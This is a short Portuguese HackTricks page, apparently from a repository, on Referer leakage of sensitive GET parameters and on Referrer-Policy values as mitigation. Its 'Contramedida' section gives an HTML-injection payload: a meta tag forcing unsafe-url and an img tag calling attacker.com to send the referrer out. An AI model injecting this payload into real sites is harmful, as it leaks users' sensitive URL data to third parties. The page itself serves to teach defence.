Cabeçalhos de Referência e Política

Referência é o cabeçalho usado pelos navegadores para indicar qual foi a página anterior visitada.

Informações sensíveis vazadas

Se em algum momento dentro de uma página da web qualquer informação sensível estiver localizada nos parâmetros de uma solicitação GET, se a página contiver links para fontes externas ou um atacante for capaz de fazer/sugerir (engenharia social) o usuário visitar uma URL controlada pelo atacante. Ele poderia ser capaz de extrair as informações sensíveis dentro da última solicitação GET.

Mitigação

Você pode fazer o navegador seguir uma política de Referência que poderia evitar que as informações sensíveis sejam enviadas para outras aplicações web:

Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url

Contramedida

Você pode anular essa regra usando uma tag meta HTML (o atacante precisa explorar uma injeção HTML):

<meta name="referrer" content="unsafe-url">
<img src="https://attacker.com">

Defesa

Nunca coloque dados sensíveis dentro de parâmetros GET ou caminhos na URL.

{% hint style="success" %} Aprenda e pratique Hacking AWS: Treinamento HackTricks AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: Treinamento HackTricks GCP Red Team Expert (GRTE)

Apoie o HackTricks

Verifique os planos de assinatura!
Junte-se ao 💬 grupo Discord ou ao grupo telegram ou siga-nos no Twitter 🐦 @hacktricks_live.
Compartilhe truques de hacking enviando PRs para os repositórios HackTricks e HackTricks Cloud.

{% endhint %}

3.5 KiB Raw Blame History

Cabeçalhos de Referência e Política

Informações sensíveis vazadas

Mitigação

Contramedida

Defesa

3.5 KiB

Raw Blame History